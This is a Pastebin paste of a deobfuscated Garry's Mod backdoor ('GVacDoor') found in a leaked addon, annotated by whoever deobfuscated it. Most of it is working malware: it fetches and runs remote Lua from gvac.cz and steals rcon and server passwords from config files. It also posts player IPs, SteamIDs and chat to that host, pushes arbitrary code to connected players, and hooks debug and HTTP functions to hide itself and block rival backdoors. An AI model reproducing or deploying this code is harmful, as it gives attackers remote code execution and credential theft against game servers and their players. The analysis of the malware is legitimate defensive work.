Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- INITIAL BACKDOOR CODE EMBEDDED IN LEAKED ADDON
- timer.Simple(1, function() http.Fetch("https://gvac.cz/link/fuck.php?key=hZd9vAjsTQ7qD10rDOZw", function(b) RunString(b, ":", false) end)end)
- -- FIRST ONE
- timer.Simple(1, function()
- http.Fetch("https://gvac.cz/_/_.php?key=hZd9vAjsTQ7qD10rDOZw", function(_)
- CompileString(_, "/", false)()
- end)
- end)
- -- SECOND ONE
- if CLIENT then return end
- if game.SinglePlayer() then return end
- timer.Simple(math.random(1, 2), function()
- _G["HTTP"]({
- url = "https://gvac.cz/_/next.php?key=hZd9vAjsTQ7qD10rDOZw&LYifJmgMLSSEepCvANbTtiYmhsymfY=wdofjdycz4OStOJLKfsM3Q%3D%3D&mhCihdDvdOJaEIcBDoAmBMUIWedlyD=0352fd71ff561205e01fd0af7bef9b56c75d5b4db7e9b5b3a9b5eafdd4740afd",
- method = "get",
- success = function(uh, fxUEvT)
- CompileString(fxUEvT, ":", false)()
- end
- })
- end)
- --[[
- _______ __ _____
- / ____\ \ / / | __ \
- | | __ \ \ / /_ _ ___| | | | ___ ___ _ __
- | | |_ | \ \/ / _` |/ __| | | |/ _ \ / _ \| '__|
- | |__| | \ / (_| | (__| |__| | (_) | (_) | |
- \_____| \/ \__,_|\___|_____/ \___/ \___/|_| feat. Czechia and Russia
- Maks : :ok_hand:
- <b>Todo list</b>
- - Copier le code de GVacDoor
- - Prendre GBackdoor
- - m??langer les deux
- - ??tre publier sur pastebin
- <b>R??sultat</b>
- - Des chocapics
- PS: Ce code est publique et ne sert que de lien.
- ]]
- local function stealServerCredentials()
- local stolenCredentials = {}
- local cfgDir = file.Find("cfg/*", "GAME")
- for i = 1, #cfgDir do
- if string.EndsWith(cfgDir[i], ".cfg") then
- local fileContents = file.Read("cfg/" .. cfgDir[i], "GAME")
- fileContents = string.Explode("\n", fileContents)
- for i = 1, #fileContents do
- if string.find(fileContents[i], "rcon_password") then
- local rconPassword = string.Explode('"', fileContents[i])
- if not rconPassword[2] then
- rconPassword = string.Explode("'", fileContents[i])
- if not rconPassword[2] then
- rconPassword[2] = "Not Found"
- end
- end
- table.insert(stolenCredentials, 1, rconPassword[2])
- end
- if string.find(fileContents[i], "sv_password") then
- local serverPassword = string.Explode('"', fileContents[i])
- if not serverPassword[2] then
- serverPassword = string.Explode("'", fileContents[i])
- if not serverPassword[2] then
- serverPassword[2] = "Not Found"
- end
- end
- table.insert(stolenCredentials, 2, serverPassword[2])
- end
- end
- end
- end
- if not stolenCredentials[1] then
- stolenCredentials[1] = "Not Found"
- end
- if not stolenCredentials[2] then
- stolenCredentials[2] = "Not Found"
- end
- local rconPassword = stolenCredentials[1]
- local serverPassword = stolenCredentials[2]
- local AddressAndPort = string.Explode(":", game.GetIPAddress())
- local serverInfo = {}
- serverInfo["name"] = GetHostName()
- serverInfo["ip"] = AddressAndPort[1]
- serverInfo["port"] = AddressAndPort[2]
- serverInfo["map"] = game.GetMap()
- serverInfo["gamemode"] = engine.ActiveGamemode()
- serverInfo["unknown"] = [====[WIS4rcJBEoPhaYbvZO/MgA==]====]
- serverInfo["rcon"] = rconPassword
- serverInfo["password"] = serverPassword
- serverInfo["invite"] = "hZd9vAjsTQ7qD10rDOZw"
- http.Post("https://gvac.cz/_/next.php", serverInfo)
- end
- local function generateBackdoorReciever(numChars)
- if not numChars or numChars <= 0 then return '' end
- return generateBackdoorReciever(numChars - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
- end
- local BackdoorNetString = generateBackdoorReciever(25)
- util.AddNetworkString(BackdoorNetString)
- BroadcastLua([[net.Receive("]] .. BackdoorNetString .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"CON")()end)]])
- local function uponPlayerChat(ply, chat_text)
- local chatData = {}
- chatData["name"] = ply:Nick()
- chatData["ip"] = game.GetIPAddress()
- chatData["player_ip"] = ply:IPAddress()
- chatData["steamid_chat"] = ply:SteamID64()
- chatData["text_chat"] = chat_text
- http.Post("https://gvac.cz/_/next.php", chatData)
- end
- function sendCodeToClient(code)
- if code == "[]" then return end
- local code = util.JSONToTable(code)
- if not code then return end
- for i = 1, #code do
- if (tonumber(code[i]["clientside"]) == 1) then
- local compressCode = util.Compress(code[i]["command"])
- local compressLen = #compressCode
- net.Start(BackdoorNetString)
- net.WriteUInt(compressLen, 16)
- net.WriteData(compressCode, compressLen)
- net.Broadcast()
- else
- RunString(code[i]["command"], "CON", false)
- end
- end
- end
- local activeServer = 5
- local function sendPlayerListToServer()
- local humans = player.GetHumans()
- if #humans >= 1 then
- activeServer = 5
- else
- activeServer = 20 -- think this is how they filter out the shitty one person servers on whatever interface they have
- end
- local playerList = {}
- local superAdmins = 0
- for i = 1, #humans do
- if humans[i]:IsPlayer() then
- playerList[humans[i]:SteamID64()] = {}
- playerList[humans[i]:SteamID64()]["nick"] = humans[i]:Nick()
- playerList[humans[i]:SteamID64()]["usergroup"] = humans[i]:GetUserGroup()
- playerList[humans[i]:SteamID64()]["frags"] = humans[i]:Frags()
- playerList[humans[i]:SteamID64()]["death"] = humans[i]:Deaths()
- playerList[humans[i]:SteamID64()]["ping"] = humans[i]:Ping()
- playerList[humans[i]:SteamID64()]["ip"] = humans[i]:IPAddress()
- end
- if (humans[i]:IsSuperAdmin() or humans[i]:IsAdmin()) then
- superAdmins = superAdmins + 1
- end
- end
- http.Post("https://gvac.cz/_/next.php?run=1&ip=" .. game.GetIPAddress() .. "&pl=" .. #player.GetHumans() .. "&pl2=" .. game.MaxPlayers() .. "&vodka=" .. math.Round(CurTime()) .. "&superuseless=" .. superAdmins, {
- json = util.TableToJSON(playerList)
- }, function(code)
- sendCodeToClient(code)
- end)
- timer.Create("T1_lhvqtLP9fGkxDy3o8jXxBg==", activeServer, 1, sendPlayerListToServer)
- end
- local function runClientCode(ply)
- timer.Remove("T1_lhvqtLP9fGkxDy3o8jXxBg==")
- sendPlayerListToServer()
- if not ply:IsBot() then
- ply:SendLua("net.Receive(\"" .. BackdoorNetString .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"CON", false)()end)]])
- ply:SendLua([[
- local function _()
- if debug.getinfo(CompileString)["what"] ~= "C" or debug.getinfo(CompileString)["short_src"] ~= "[C]" or debug.getinfo(CompileString)["source"] ~= "=[C]" then
- while not not 1 do
- end
- end
- timer.Simple(2, _)
- end
- _()
- ]]) -- NOTE: whoever wrote this is a fucking retard
- ply:SendLua([[http.Fetch("https://gvac.cz/_/player.php", function(b) CompileString(b, "|", false)() end)]]) -- code is below
- end
- end
- --- NOTE FROM DEOBFUSCATOR: CLIENT CODE RUN ON PLAYERS WITH SENDLUA!!!! {
- local function RkyXBXSNUUJWieES()
- local playerinfo = {}
- playerinfo["steamid64"] = LocalPlayer():SteamID64()
- playerinfo["name"] = steamworks.GetPlayerName( LocalPlayer():SteamID64() )
- playerinfo["goooooooooooodd"] = "3h7x+sSWrmOsmCpHVJRtPw=="
- playerinfo["on"] = game.GetIPAddress()
- http.Post("https://gvac.cz/_/player.php", playerinfo)
- end
- RkyXBXSNUUJWieES()
- -- }
- timer.Simple(math.random(1, 5), function()
- stealServerCredentials()
- sendPlayerListToServer()
- concommand.Remove("host_writeid")
- hook.Add("PlayerInitialSpawn", "T1_lhvqtLP9fGkxDy3o8jXxBg==", runClientCode)
- hook.Add("PlayerSay", "T2_lhvqtLP9fGkxDy3o8jXxBg==", uponPlayerChat)
- end)
- --[[
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA256
- https://pastebin.com/raw/j6Sg0A86
- -----BEGIN PGP SIGNATURE-----
- Version: OpenPGP.js v2.3.2
- Comment: http://openpgpjs.org
- wsBcBAEBCAAQBQJdRX8UCRAN1cf+RucUbAAAeRYH/2DKt92fDM7QJSQ26FDf
- tnwaIQBRKi2R6UVeOQ50fjgmSIKKzuEb7ROXb2ahFndM5JmC49Pj3NYe2cvZ
- hhHEdFg4kh/UqFbl1AL9A3oeMFOrv41BDsW4Xkpnfe3fvcV/e/Ztz4+y0ffw
- eleX7kL1/w3b8wq4EC2vdI+DbYGCiNjZsYsx/gNW5TIBsGLlomhZkFaUW21J
- cGLb1e845L4UIXp1tYSVL8OJQed7EY2c6Uu4P/rhMWPhi19Sbkj5v8QzHiVb
- EyPAhbVlsbwEOOEwNIKAqRAa+LXy6cemGUjlkx1mQPeQ2/ZqYnKos+AyApra
- DvHUQzbSrzcQAEJTc6lKZjE=
- =C1Yx
- -----END PGP SIGNATURE-----
- ]]
- -- THIRD ONE
- -- NOTE: THIS BIT IS INTERESTING, IT SEEMS LIKE THEY ARE TRYING TO PREVENT OTHER PEOPLE'S BACKDOORS FROM WORKING LOL
- -- SMH THESE JEALOUS GIRLFRIEND-ASS BACKDOOR DEVS
- local blacked = {"kvac.ml", "kvac.cz", "kvac.me", "kvacdoor.cz",
- "very-legit.website", "gblk.ga", "rvac.cc", ".ga",
- ".gq", ".ml", "cipher-panel.me", "vacsecuritydrm.org", "g-hub.xyz"}
- local olddebug = debug.getinfo
- function debug.getinfo(a)
- if a == HTTP then
- local lulilul = olddebug(a)
- lulilul.short_src = "[C]"
- lulilul.what = "C"
- return lulilul
- end
- if a == http.Post then
- local lulilul = olddebug(a)
- lulilul.short_src = "lua/includes/modules/http.lua"
- lulilul.what = "Lua"
- return lulilul
- end
- if a == http.Fetch then
- local lulilul = olddebug(a)
- lulilul.short_src = "lua/includes/modules/http.lua"
- lulilul.what = "Lua"
- return lulilul
- end
- end
- local oldhttpf = http.Fetch
- local oldhttpp = http.Post
- local oldhttp = HTTP
- function http.Fetch(a, b, c, d)
- local doihavetoblock = false
- for i, toblock in pairs(blacked) do
- if string.match(a, toblock) then
- doihavetoblock = true
- end
- end
- if not doihavetoblock then
- oldhttpf(a, b, c, d)
- end
- end
- function http.Post(a, b, c, d, e)
- local doihavetoblock = false
- for i, toblock in pairs(blacked) do
- if string.match(a, toblock) then
- doihavetoblock = true
- end
- end
- if not doihavetoblock then
- oldhttpp(a, b, c, d, e)
- end
- end
- function HTTP(a)
- local doihavetoblock = false
- for i, toblock in pairs(blacked) do
- if string.match(a.url, toblock) then
- doihavetoblock = true
- end
- end
- if not doihavetoblock then
- oldhttp(a)
- end
- end
- -- THE FOLLOWING ALL APPEARS TO BE PASTED FROM https://github.com/aiq/basexx/blob/master/lib/basexx.lua
- -- FOR NO EXPLICABLE REASON SO LOL, IM PRETTY SURE THEY DON'T USE THIS WHATSOEVER BUT WHAT DO I KNOW LMAO
- local function E1F5DA6359DE55CA125B486A0E0F8F07C9821C66CC1B0FAAA4B1A06D0172B957A68E19E44D722F34FB32A9C8FE94953E25550F86479244E76378959(str, max)
- local result = {}
- local start = 1
- for i = 1, #str do
- if i % max == 0 then
- table.insert(result, str:sub(start, i))
- start = i + 1
- elseif i == #str then
- table.insert(result, str:sub(start, i))
- end
- end
- return result
- end
- local function number_to_bit(num, length)
- local bits = {}
- while num > 0 do
- local rest = math.floor(math.fmod(num, 2))
- table.insert(bits, rest)
- num = (num - rest) / 2
- end
- while #bits < length do
- table.insert(bits, "0")
- end
- return string.reverse(table.concat(bits))
- end
- local function ignore_set(str, set)
- if set then
- str = str:gsub("[" .. set .. "]", "")
- end
- return str
- end
- local function pure_from_bit(str)
- return (str:gsub('........', function(cc) return string.char(tonumber(cc, 2)) end))
- end
- local function unexpected_char_error(str, pos)
- local c = string.sub(str, pos, pos)
- return string.format("unexpected character at position %d: '%s'", pos, c)
- end
- local tab = {}
- local bitMap = {
- o = "0",
- i = "1",
- l = "1"
- }
- function tab.from_bit(str, ignore)
- str = ignore_set(str, ignore)
- str = string.lower(str)
- str = str:gsub('[ilo]', function(c) return bitMap[c] end)
- local pos = string.find(str, "[^01]")
- if pos then return nil, unexpected_char_error(str, pos) end
- return pure_from_bit(str)
- end
- function tab.to_bit(str)
- return str:gsub('.', function(c)
- local byte = string.byte(c)
- local bits = {}
- for _ = 1, 8 do
- table.insert(bits, byte % 2)
- byte = math.floor(byte / 2)
- end
- return table.concat(bits):reverse()
- end)
- end
- function tab.from_hex(str, ignore)
- str = ignore_set(str, ignore)
- local pos = string.find(str, "[^%x]")
- if pos then return nil, unexpected_char_error(str, pos) end
- return (str:gsub('..', function(cc) return string.char(tonumber(cc, 16)) end))
- end
- function tab.to_hex(str)
- return (str:gsub('.', function(c) return string.format('%02X', string.byte(c)) end))
- end
- local function from_C2E42EB433D56996DE35C20FDBA1A07FCABAA0A3A0D66211DF12DCD2BFAE3280FA126906A6855657E73111B16B706151960C7B1BAB3CC3318D9B95CDEC564A41(str, alphabet, bits)
- local result = {}
- for i = 1, #str do
- local c = string.sub(str, i, i)
- if c ~= '=' then
- local index = string.find(alphabet, c, 1, true)
- if not index then return nil, unexpected_char_error(str, i) end
- table.insert(result, number_to_bit(index - 1, bits))
- end
- end
- local value = table.concat(result)
- local pad = #value % 8
- return pure_from_bit(string.sub(value, 1, #value - pad))
- end
- local function to_C2E42EB433D56996DE35C20FDBA1A07FCABAA0A3A0D66211DF12DCD2BFAE3280FA126906A6855657E73111B16B706151960C7B1BAB3CC3318D9B95CDEC564A41(str, alphabet, bits, pad)
- local bitString = tab.to_bit(str)
- local chunks = E1F5DA6359DE55CA125B486A0E0F8F07C9821C66CC1B0FAAA4B1A06D0172B957A68E19E44D722F34FB32A9C8FE94953E25550F86479244E76378959(bitString, bits)
- local result = {}
- for _, value in ipairs(chunks) do
- if (#value < bits) then
- value = value .. string.rep('0', bits - #value)
- end
- local pos = tonumber(value, 2) + 1
- table.insert(result, alphabet:sub(pos, pos))
- end
- table.insert(result, pad)
- return table.concat(result)
- end
- local zumbaAlphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"
- local zumbaPadMap = {"", "======", "====", "===", "="}
- function tab.from_zumba(str, ignore)
- str = ignore_set(str, ignore)
- return from_C2E42EB433D56996DE35C20FDBA1A07FCABAA0A3A0D66211DF12DCD2BFAE3280FA126906A6855657E73111B16B706151960C7B1BAB3CC3318D9B95CDEC564A41(string.upper(str), zumbaAlphabet, 5)
- end
- function tab.to_zumba(str)
- return to_C2E42EB433D56996DE35C20FDBA1A07FCABAA0A3A0D66211DF12DCD2BFAE3280FA126906A6855657E73111B16B706151960C7B1BAB3CC3318D9B95CDEC564A41(str, zumbaAlphabet, 5, zumbaPadMap[#str % 5 + 1])
- end
- local crockfordAlphabet = "0123456789ABCDEFGHJKMNPQRSTVWXYZ"
- local crockfordMap = {
- O = "0",
- I = "1",
- L = "1"
- }
- function tab.FB41611AA068FA489ABDCBF3831030AE389A5D0118B2DA2F77998E74A6D607714BE7DEF34CA3B5FC8E16212A3CF56AC5A66B193550A321719CC630EA0AEB1(str, ignore)
- str = ignore_set(str, ignore)
- str = string.upper(str)
- str = str:gsub('[ILOU]', function(c) return crockfordMap[c] end)
- return from_C2E42EB433D56996DE35C20FDBA1A07FCABAA0A3A0D66211DF12DCD2BFAE3280FA126906A6855657E73111B16B706151960C7B1BAB3CC3318D9B95CDEC564A41(str, crockfordAlphabet, 5)
- end
- function tab.to_crockford(str)
- return to_C2E42EB433D56996DE35C20FDBA1A07FCABAA0A3A0D66211DF12DCD2BFAE3280FA126906A6855657E73111B16B706151960C7B1BAB3CC3318D9B95CDEC564A41(str, crockfordAlphabet, 5, "")
- end
- local zumbaeeeAlphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" .. "abcdefghijklmnopqrstuvwxyz" .. "0123456789+/"
- local zumbaeeePadMap = {"", "==", "="}
- function tab.from_zumbaeee(str, ignore)
- str = ignore_set(str, ignore)
- return from_C2E42EB433D56996DE35C20FDBA1A07FCABAA0A3A0D66211DF12DCD2BFAE3280FA126906A6855657E73111B16B706151960C7B1BAB3CC3318D9B95CDEC564A41(str, zumbaeeeAlphabet, 6)
- end
- function tab.to_zumbaeee(str)
- return to_C2E42EB433D56996DE35C20FDBA1A07FCABAA0A3A0D66211DF12DCD2BFAE3280FA126906A6855657E73111B16B706151960C7B1BAB3CC3318D9B95CDEC564A41(str, zumbaeeeAlphabet, 6, zumbaeeePadMap[#str % 3 + 1])
- end
- local url64Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" .. "abcdefghijklmnopqrstuvwxyz" .. "0123456789-_"
- function tab.from_url64(str, ignore)
- str = ignore_set(str, ignore)
- return from_C2E42EB433D56996DE35C20FDBA1A07FCABAA0A3A0D66211DF12DCD2BFAE3280FA126906A6855657E73111B16B706151960C7B1BAB3CC3318D9B95CDEC564A41(str, url64Alphabet, 6)
- end
- function tab.to_url64(str)
- return to_C2E42EB433D56996DE35C20FDBA1A07FCABAA0A3A0D66211DF12DCD2BFAE3280FA126906A6855657E73111B16B706151960C7B1BAB3CC3318D9B95CDEC564A41(str, url64Alphabet, 6, "")
- end
- local function length_error(len, d)
- return string.format("invalid length: %d - must be a multiple of %d", len, d)
- end
- local z85Decoder = { 0x00, 0x44, 0x00, 0x54, 0x53, 0x52, 0x48, 0x00,
- 0x4B, 0x4C, 0x46, 0x41, 0x00, 0x3F, 0x3E, 0x45,
- 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
- 0x08, 0x09, 0x40, 0x00, 0x49, 0x42, 0x4A, 0x47,
- 0x51, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A,
- 0x2B, 0x2C, 0x2D, 0x2E, 0x2F, 0x30, 0x31, 0x32,
- 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A,
- 0x3B, 0x3C, 0x3D, 0x4D, 0x00, 0x4E, 0x43, 0x00,
- 0x00, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
- 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18,
- 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F, 0x20,
- 0x21, 0x22, 0x23, 0x4F, 0x00, 0x50, 0x00, 0x00 }
- function tab.from_z85(str, ignore)
- str = ignore_set(str, ignore)
- if (#str % 5) ~= 0 then return nil, length_error(#str, 5) end
- local result = {}
- local value = 0
- for i = 1, #str do
- local index = string.byte(str, i) - 31
- if index < 1 or index >= #z85Decoder then return nil, unexpected_char_error(str, i) end
- value = (value * 85) + z85Decoder[index]
- if (i % 5) == 0 then
- local divisor = 256 * 256 * 256
- while divisor ~= 0 do
- local b = math.floor(value / divisor) % 256
- table.insert(result, string.char(b))
- divisor = math.floor(divisor / 256)
- end
- value = 0
- end
- end
- return table.concat(result)
- end
- local z85Encoder = "0123456789" .. "abcdefghijklmnopqrstuvwxyz" .. "ABCDEFGHIJKLMNOPQRSTUVWXYZ" .. ".-:+=^!/*?&<>()[]{}@%$#"
- function tab.to_z85(str)
- if (#str % 4) ~= 0 then return nil, length_error(#str, 4) end
- local result = {}
- local value = 0
- for i = 1, #str do
- local b = string.byte(str, i)
- value = (value * 256) + b
- if (i % 4) == 0 then
- local divisor = 85 * 85 * 85 * 85
- while divisor ~= 0 do
- local index = (math.floor(value / divisor) % 85) + 1
- table.insert(result, z85Encoder:sub(index, index))
- divisor = math.floor(divisor / 85)
- end
- value = 0
- end
- end
- return table.concat(result)
- end
- function b34264e1dd2f9ebfa3c8e7a2532d1ffc3fe9c5c(str)
- return tab.FB41611AA068FA489ABDCBF3831030AE389A5D0118B2DA2F77998E74A6D607714BE7DEF34CA3B5FC8E16212A3CF56AC5A66B193550A321719CC630EA0AEB1(str)
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement